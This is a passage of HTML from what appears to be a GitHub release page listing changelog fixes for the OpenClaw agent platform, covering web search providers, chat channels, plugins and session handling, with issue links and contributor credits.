data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</p>
</li>
<li>
<p>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</p>
</li>
<li>
<p>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</p>
</li>
<li>
<p>Web search/SearXNG: show the JSON API <code>search.formats</code> prerequisite during SearXNG setup before prompting for the base URL. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>.</p>
</li>
<li>
<p>Web search/SearXNG: pass through <code>img_src</code> image URLs from SearXNG image-category results. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>.</p>
</li>
<li>
<p>Web search/Kimi: fail explicitly when Moonshot returns an ungrounded chat answer instead of native web-search evidence, so Kimi no longer reports generic fallback text as a successful search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>.</p>
</li>
<li>
<p>Web search: keep public provider requests on the strict SSRF guard and reserve private-network access for explicit self-hosted SearXNG/Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>.</p>
</li>
<li>
<p>Firecrawl: reject private, loopback, metadata, and non-HTTP(S) <code>firecrawl_scrape</code> target URLs before forwarding them to Firecrawl. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>.</p>
</li>
<li>
<p>Web search/Firecrawl: allow self-hosted private/internal Firecrawl <code>baseUrl</code> endpoints, including HTTP for private targets, while keeping hosted Firecrawl on the strict official endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</p>
</li>
<li>
<p>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</p>
</li>
<li>
<p>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</p>
</li>
<li>
<p>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</p>
</li>
<li>
<p>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Web search/Exa: accept <code>plugins.entries.exa.config.webSearch.baseUrl</code>, normalize it to the Exa <code>/search</code> endpoint, and partition cached results by endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>.</p>
</li>
<li>
<p>Web search/MiniMax: include MiniMax Search in the web-search setup flow and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</p>
</li>
<li>
<p>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</p>
</li>
<li>
<p>Web search/MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials, so OAuth-authorized MiniMax Token Plan setups do not need a separate web-search key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>.</p>
</li>
<li>
<p>Providers/MiniMax: derive Coding Plan usage polling from the configured MiniMax base URL, so global setups no longer query the CN usage host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</p>
</li>
<li>
<p>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</p>
</li>
<li>
<p>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</p>
</li>
<li>
<p>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</p>
</li>
<li>
<p>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</p>
</li>
<li>
<p>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</p>
</li>
<li>
<p>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</p>
</li>
<li>
<p>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</p>
</li>
<li>
<p>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</p>
</li>
<li>
<p>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</p>
</li>
<li>
<p>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</p>
</li>
<li>
<p>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</p>
</li>
<li>
